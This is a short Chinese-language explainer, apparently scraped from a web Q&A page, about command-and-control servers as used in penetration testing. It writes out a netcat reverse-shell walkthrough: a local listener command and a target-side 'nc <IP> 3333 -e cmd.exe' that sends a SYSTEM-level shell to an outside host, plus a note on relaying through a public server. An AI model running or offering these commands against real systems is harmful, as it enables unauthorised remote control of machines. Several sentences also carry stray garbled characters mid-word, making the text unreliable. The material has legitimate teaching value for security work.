nc伺服器是什麼

Ⅰ 什麼是C&C伺服器

C&C 伺服器的全稱是 Command and Control Server，翻譯過來就是命令和控制伺服器

通常在做滲透測試的時候，在拿到一個 webshell 的時候，需要對伺服器進行提權操作，如果是一台 windows 的伺服器，提權的時候通常是利用本地提權漏洞的 exp 進行溢出提權，有些 exp 可以直接在後面加參數，溢出成功之後執行參數中的命令。

而有橘橋的 exp 溢出成功之後是返回一個 system 許可權的 cmd，這時就需要將低許可權的 cmd shell 反彈回本地，這里用 nc 在本地執行：nc -vv -lp 3333

上述命令的意思是在本地監聽一個 3333 埠等待連接，假設電腦 IP 是公網的，並且 IP 為 114.114.114.114，然後在目標伺服器就可以執行：nc 114.114.114.114 3333 -e cmd.exe

上面的命令就可以把遠程伺服器的伺服器許可權的 cmd shell 返回到本地，這時你就可以通過 nc 建立的這個 shell 進行通信，發送你要執行的命令，在遠程伺服器接收到命令之後執行並將結果返回，這時本機電腦就是一個簡易的 C&C 服圓慎猛務器。

(1)nc伺服器是什麼擴展閱讀：

C&C 伺服器使目標機器可以接收來自伺服器的命令，從而達到伺服器控制目標機器的目的。該方法常用於病毒木馬控制被感染的機器。

通常只有這樣內網的伺服器才可以訪問進行連接，所以可以使用一台中轉伺服器，這台中轉伺服器有一個公網 IP 地址是：111.111.111.111，這樣不管是目標伺服器還是我孝檔們本機都可以訪問這台中轉伺服器。

這里中轉伺服器的作用就是本地內網的主機監聽的埠映射到公網 IP 的某個埠，這樣目標機訪問中轉伺服器監聽的埠就相當於訪問了我們本地監聽的埠。